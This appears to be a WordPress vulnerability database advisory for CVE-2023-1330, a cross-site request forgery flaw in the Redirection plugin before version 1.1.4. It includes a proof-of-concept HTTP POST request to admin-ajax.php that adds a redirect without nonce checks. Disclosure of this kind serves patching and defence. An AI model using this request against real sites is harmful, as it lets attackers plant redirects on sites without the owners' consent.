WordPress Plugin Vulnerabilities

Redirection < 1.1.4 - Redirect Creation via CSRF

Description

The plugin does not add nonce verification in place when adding the redirect, which could allow attackers to add redirects via a CSRF attack.

Proof of Concept

````
POST /wp-admin/admin-ajax.php HTTP/2
Host: sawcup.s2-tastewp.com
Cookie: test=test;
User-Agent: useragent
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://sawcup.s2-tastewp.com/wp-admin/admin.php?page=irrp-redirection
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Origin: https://sawcup.s2-tastewp.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

action=irAddRedirect&id=0&from=https%3a%2f%2fsawcup.s2-tastewp.com%2ftest&to=https%3a%2f%2fexample.com%2f&selected=&redirectionType=redirection
````

Affects Plugins

Plugin icon
redirect-redirection
Fixed in 1.1.4

References

CVE
CVE-2023-1330

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
6.5 (medium)

Miscellaneous

Original Researcher
Mohamed Selim
Submitter
Mohamed Selim
Submitter website
https://facebook.com/caesareg
Verified
Yes
WPVDB ID
de4cff6d-0030-40e6-8221-fef56e12b4de

Timeline

Publicly Published
2023-03-10 (about 1 years ago)
Added
2023-03-10 (about 1 years ago)
Last Updated
2023-03-10 (about 1 years ago)

Other

Published
Title
Published
2020-09-16
Title
WP Project Manager < 2.4.1 - Cross-Site Request Forgery
Published
2022-09-01
Title
Captcha Code < 2.8 - Settings Update via CSRF
Published
2023-05-09
Title
Easy Hide Login < 1.0.9 - Arbitrary settings update via CSRF
Published
2024-04-12
Title
BEAF < 4.5.5 - Cross-Site Request Forgery to Notice Dismissal
Published
2021-07-19
Title
RestroPress < 2.8.3 - Cart Manipulation via CSRF